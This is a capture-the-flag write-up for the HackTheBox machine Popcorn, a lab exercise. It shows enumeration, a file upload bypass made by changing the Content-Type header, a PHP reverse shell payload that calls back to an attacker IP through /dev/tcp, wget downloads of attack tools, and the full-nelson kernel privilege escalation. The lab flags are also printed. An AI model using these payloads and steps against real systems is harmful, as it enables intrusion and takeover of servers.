HackTheBox Popcorn
Writeup for HackTheBox Popcorn
Machine Synopsis
Key Exploitation Techniques:
- Web File Upload Vulnerability (Content-Type bypass)
- Linux Kernel Privilege Escalation (full-nelson - CVE-2012-0056)
Enumeration
1
2
3
4
5
6
7
8
9
10
$ nmap -sC -sV -A 10.10.10.6
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.12 (Ubuntu)
gobuster
revealed a /torrent
directory and a user registration/login feature.
1
2
3
4
5
6
7
$ gobuster dir -u http://10.10.10.6 -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
...
/index (Status: 200) [Size: 177]
/test (Status: 200) [Size: 47032]
/torrent (Status: 301) [Size: 310] [--> http://10.10.10.6/torrent/]
/rename (Status: 301) [Size: 309] [--> http://10.10.10.6/rename/]
...
Exploitation
Initial Access (www-data)
After creating and logging into a new account, an upload page was accessible. Initial attempts to upload a PHP reverse shell were met with a “This is not a valid torrent file” error.
A valid torrent file was uploaded, revealing an option to “change screenshot.”
Attempting to upload a PHP reverse shell as a screenshot resulted in an “invalid file” error. This suggested a client-side or server-side file type check based on extension or initial magic bytes.
The upload request was intercepted, and its Content-Type
header was changed from application/x-php
to image/png
. This bypassed the file type validation, allowing the PHP shell to be uploaded
1
2
3
4
5
# Modified HTTP Request
...
Content-Type: image/png
<?php system("bash -i >& /dev/tcp/10.10.14.9/1234 <&1"); ?>
The server response confirmed the successful upload.
A netcat
listener was set up. The reverse shell was triggered by accessing the uploaded file (e.g., http://10.10.10.6/torrent/upload/exploit.php
).
1
2
3
# Attacker machine: Netcat listener
$ nc -nlvp 1234
listening on [any] 1234 ...
A www-data
shell was obtained.
1
2
3
4
5
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.6] 34129
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -r
2.6.31-14-generic-pae
Privilege Escalation
Linux Kernel Exploit
The kernel version 2.6.31-14-generic-pae
was identified. Linux Exploit Suggester
(les.sh
) was used to find applicable local privilege escalation exploits.
1
2
3
4
5
6
7
8
9
10
11
12
13
$ wget http://10.10.14.9:8000/les.sh
$ chmod +x les.sh
$ ./les.sh
...
Possible Exploits:
cat: write error: Broken pipe
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
Details: http://vulnfactory.org/exploits/full-nelson.c
Exposure: highly probable
Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}
Download URL: http://vulnfactory.org/exploits/full-nelson.c
...
The full-nelson.c
exploit was downloaded, compiled, and executed on the target.
1
2
3
4
$ wget http://10.10.14.9:8000/full-nelson.c
$ gcc full-nelson.c -o full-nelson
$ chmod +x full-nelson
$ ./full-nelson
Execution of full-nelson
yielded a root shell
1
2
3
4
5
6
7
8
id
uid=0(root) gid=0(root)
cd /home/george
cat user.txt
c1b9db61d386e3f830c010480ab54077
cd /root
cat root.txt
c5ba80b7f9f478d28cbbf7c59df47478
The user.txt
and root.txt
flags were retrieved.